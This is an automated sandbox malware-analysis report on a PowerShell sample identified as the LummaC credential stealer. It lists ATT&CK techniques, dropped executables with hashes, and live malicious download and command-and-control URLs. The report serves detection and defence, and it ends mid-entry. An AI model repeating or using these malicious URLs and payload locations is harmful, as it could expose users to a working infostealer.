Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\ProgramData\extract\ronwod.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.ronwod.exe.1440000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ronwod.exe.1440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ronwod.exe.6c520000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.ronwod.exe.1440000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ronwod.exe.1440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ronwod.exe.6c520000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lumma.ps1	2%	Virustotal		Browse
lumma.ps1	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\extract\cr.dll	9%	ReversingLabs
C:\ProgramData\extract\ronwod.exe	43%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://druster-master.com/	0%	Avira URL Cloud	safe
https://druster-master.com	0%	Avira URL Cloud	safe
https://lackadausaz.click/api	0%	Avira URL Cloud	safe
https://lackadausaz.click/	0%	Avira URL Cloud	safe
https://iplogger.co	0%	Avira URL Cloud	safe
https://druster-master.com/gogolend1.zip	100%	Avira URL Cloud	malware
https://iplogger.coX	0%	Avira URL Cloud	safe
http://druster-master.com	0%	Avira URL Cloud	safe
http://iplogger.co	0%	Avira URL Cloud	safe
https://lackadausaz.click/4/	0%	Avira URL Cloud	safe
https://lackadausaz.click/apiZ9	0%	Avira URL Cloud	safe
lackadausaz.click	0%	Avira URL Cloud	safe
https://iplogger.co/1EnxJ4	0%	Avira URL Cloud	safe
https://iplogger.co/	0%	Avira URL Cloud	safe
https://lackadausaz.click/apiH	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
druster-master.com	104.21.64.85	true	true	unknown
lackadausaz.click	172.67.198.222	true	true	unknown
iplogger.co	172.67.167.249	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://lackadausaz.click/api	true	Avira URL Cloud: safe	unknown
scentniej.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://druster-master.com/gogolend1.zip	true	Avira URL Cloud: malware	unknown
prisonyfork.buzz	false		high
hummskitnj.buzz	false		high
https://iplogger.co/1EnxJ4	true	Avira URL Cloud: safe	unknown
lackadausaz.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.1791490853.0000020110F5F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://druster-master.com/	powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp, lumma.ps1	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.1791490853.0000020110F5F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.1791490853.0000020112720000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1791490853.00000201121A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 00000000.00000002.1791490853.0000020111E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://druster-master.com	powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1791490853.00000201122A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.coX	powershell.exe, 00000000.00000002.1791490853.0000020110EEA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/	ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000002.1818376641.0000000001503000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1803922298.0000000001535000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.co	powershell.exe, 00000000.00000002.1791490853.000002011268A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://iplogger.co	powershell.exe, 00000000.00000002.1791490853.00000201126B3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/4/	ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://druster-master.com	powershell.exe, 00000000.00000002.1791490853.0000020112531000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.1791490853.0000020110F5F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/apiZ9	ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1791490853.0000020110A81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1791490853.0000020110A81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.co/	powershell.exe, 00000000.00000002.1791490853.0000020112720000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/apiH	ronwod.exe, 00000002.00000002.1818460522.000000000151D000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.0000000001518000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.64.85	druster-master.com	United States	13335	CLOUDFLARENETUS	true
172.67.198.222	lackadausaz.click	United States	13335	CLOUDFLARENETUS	true
172.67.167.249	iplogger.co	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581568
Start date and time:	2024-12-28 09:15:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lumma.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@4/10@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 63% Number of executed functions: 20 Number of non-executed functions: 155
Cookbook Comments:	Found application associated with file extension: .ps1 Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7428 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:16:00	API Interceptor	41x Sleep call for process: powershell.exe modified
03:16:12	API Interceptor	2x Sleep call for process: ronwod.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.64.85	https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918	Get hash	malicious	Unknown	Browse
104.21.64.85	LZ_109186961250811H#U00ae.exe	Get hash	malicious	Unknown	Browse
172.67.198.222	ronwod.exe	Get hash	malicious	LummaC	Browse
172.67.167.249	win_gui.exe.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	sus.ps1	Get hash	malicious	LummaC	Browse
	ofsetvideofre.click.ps1	Get hash	malicious	LummaC	Browse
	4h1Zc12ZBe.exe	Get hash	malicious	Stealc	Browse
	dlcdkJcbbV.exe	Get hash	malicious	LummaC, RedLine	Browse
	1Vkf7silOj.exe	Get hash	malicious	LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse
	https://prezi.com/i/view/0dF0780HKO9RqC8umFaJ	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lackadausaz.click	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
lackadausaz.click	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
iplogger.co	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.82.93
	win_gui.exe.exe	Get hash	malicious	Unknown	Browse	172.67.167.249
	file.exe	Get hash	malicious	Unknown	Browse	104.21.82.93
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.167.249
	sus.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
	cW5i0RdQ4L.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	cW5i0RdQ4L.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	Activator by URKE v2.5.exe	Get hash	malicious	LummaC	Browse	172.67.188.178
	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Get hash	malicious	Unknown	Browse	104.21.76.57

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	48.252.190.9.zip	Get hash	malicious	Unknown	Browse	104.21.95.219
	https://haleborealis.com	Get hash	malicious	Unknown	Browse	104.22.72.81
	External2.4.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
CLOUDFLARENETUS	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	48.252.190.9.zip	Get hash	malicious	Unknown	Browse	104.21.95.219
	https://haleborealis.com	Get hash	malicious	Unknown	Browse	104.22.72.81
	External2.4.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
CLOUDFLARENETUS	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	48.252.190.9.zip	Get hash	malicious	Unknown	Browse	104.21.95.219
	https://haleborealis.com	Get hash	malicious	Unknown	Browse	104.22.72.81
	External2.4.exe	Get hash	malicious	LummaC	Browse	104.21.29.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Titan.exe	Get hash	malicious	Unknown	Browse	104.21.64.85 172.67.167.249
	Titan.exe	Get hash	malicious	Unknown	Browse	104.21.64.85 172.67.167.249
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	104.21.64.85 172.67.167.249
	iviewers.dll	Get hash	malicious	LummaC	Browse	104.21.64.85 172.67.167.249
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	104.21.64.85 172.67.167.249
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.64.85 172.67.167.249
	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	104.21.64.85 172.67.167.249
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	104.21.64.85 172.67.167.249
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	104.21.64.85 172.67.167.249
	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	104.21.64.85 172.67.167.249
a0e9f5d64349fb13191bc781f81f42e1	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.222
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.222
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	Script.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	Neverlose.cc-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	External2.4.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	Aura.exe	Get hash	malicious	LummaC	Browse	172.67.198.222

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	658432
Entropy (8bit):	4.992895243121171
Encrypted:	false
SSDEEP:	12288:3YvcUYAmNNRnNlkCCcIKF6kivTgf2yC2IjxB+JXM1R:IvcUDqNlxaKCUHIetO
MD5:	A1809A9703C98F714BC85BA1A995588C
SHA1:	A2E14CCC28581D7DAAC22AC41A079B6E459E2EAD
SHA-256:	A956D9A1320BB2E9D859035380489A834EB62FA7EBA1190B48E0C2EF87E2EAB5
SHA-512:	424A8FF3A7B37938FA2DE9CEE1ECBD3434F628737675094E8F3B883C221158D2CFF5CAC94062407E3431BEEECAAFDEF7137383FA48D710D88BABC962599D7F55
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg...........#...'...........................g......................................@... ......................0..R....@...............................p..T...........................p.......................TA...............................text...............................`..`.data...`X.......Z..................@....rdata..............................@..@.eh_fram,...........................@..@.bss......... ...........................edata..R....0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....reloc..T....p......................@..B................................................................................................................................................................................................................................

C:\ProgramData\extract\ronwod.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	5.953519512977486
Encrypted:	false
SSDEEP:	768:iZBrjUZQBuH24LfgzBXGkd+vA4BfBs2wWwid:k1A1H24gzBXlsvWW
MD5:	63FF0C8E75AA669F22E79EBF017C0AA8
SHA1:	1255D7F37E1D2D36632BD142B76D8141C47C45A3
SHA-256:	E8AC8D925F9B53BB66892CBAC2F38CF7C1BCC5802A79C74C6D8B54E684B66E6A
SHA-512:	1756B3B2BC7CEB6E65812472449B6D3986798885EFE36EEC4F09D84A2C02DD553BE54A57D4FCADB9212017CE1E00F6EAE27BE295AA1544D779ACFDF9337E19B3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg...............'.<...l......m4.......P....@.......................................@... .................................p............................................................a.......................................................text....;.......<..................`..`.data...,....P.......@..............@....rdata.......`.......B..............@..@.eh_framt....p.......L..............@..@.bss.....................................idata..p............X..............@....CRT....0............b..............@....tls.................d..............@....rsrc................f..............@....reloc...............l..............@..B................................................................................................................................................................................................................................

C:\ProgramData\pakgea.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	365995
Entropy (8bit):	7.981364199944572
Encrypted:	false
SSDEEP:	6144:9kdrOKJXLLCuUP8qIf3Cz4R6cRYCWYpfJlKYTH0iNeYcPhH/+ztaaYdcq2/4IhW:GrZShP8OzVcGYfJliO2ZfzxZWxW
MD5:	88CA7B3DE2500E882A7D5525EE37BAA1
SHA1:	4793F616E757EC31BCB1AD3CECE9EADA5BDDC392
SHA-256:	6944287111A5A7194DA04F29D442B2D749C12B771C8C0C4684FCB97A64C9E5EA
SHA-512:	2A391F2D57D9B22B89F64645051B029EEC1A0971896C0187865581FC4987B3742FA2A2026AFBE0F0CAC32E4FD6048C8AAB8FC1F29928C77DE547014935A97275
Malicious:	false
Reputation:	low
Preview:	PK...........Y...".\..........cr.dll..y\...?..Q0T.Q..0G....dJ.......M..I.cq..E,".5S25.L..p..%.2C.4w........}..........z..oqf>...s.k?.....>.R.b.x..rY,.-._.....t\|.l..N...?7....lp.3.6>9).9j.-:11).6:...hs&.z=;.6.)&..._..SG..b..Y.l.........U..-o....R.b.m.c+>.I..8...p+.....O\.._=p.../......,..G=..:.....,.k....]...?...Y.r.....]j.T......V.N....]LTj.......<~.1.n..]..X^W....KI..,.]l..c@..wH.(.......9^#_.z.../]......5.,..G}N]...a...r...8X...W......KM \|R.e.)W...K.MH..h...a...r.[.../.<..+.b.._.m&Nw...Y.R........2..BB2.....`.......(Q.]'...er..ANjKK.+..].3.6.`f]...e`.Jd.@.'...aFe-...p....~......;.YE/.\|q....eT...1KD.ts..:\+.6@.v..?..]..]6.D.D..;.5M...P.g...3f.Oxk5.2..N\..-.S........%..58.....WQF.o..tY...}]...gL...1@f...... 4...*........J.M....u.Q.....)[..j..O...H9/]....O{..<...{..w.j..!.~...kP..pBV`.J....i}Ih`!...W...!>Y.!^Y.!%uR.i\|...<..q....sB.oy.M..EY%/.\|q...S.....U.......D.r_P.....p..3... .R../...O&j.....)...@.r.....M....:.s...7ji....@....o.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1524
Entropy (8bit):	5.346561033776353
Encrypted:	false
SSDEEP:	24:3ISKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0OXNgr8HL9viLAl/:4SU4y4RQmFoUeCamfm9qr9trBLNGOXNV
MD5:	569CE7025BB2D055B0609D0CB352F9A0
SHA1:	617D9AE078C50A7A679C582730F0562482DA988A
SHA-256:	016151AF4F9970016F27D6FBCB3289B820C26E74C73C0D1ABC2B5E12C7C0A05E
SHA-512:	A718A372CF016D124DCB6BB533FC4B3D8C6A02885997E597166FEA2C808CE90689FCDFDBC81FFBA7BBD40A750DBB902622A315584C227FA241BA35544A9E0D18
Malicious:	false
Reputation:	low
Preview:	@...e...........).....................X..............@..........@...............\|.jdY\.H.s9.!..\|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppr24bc0.r13.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q23quk4v.xsq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfp0m4xw.smg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
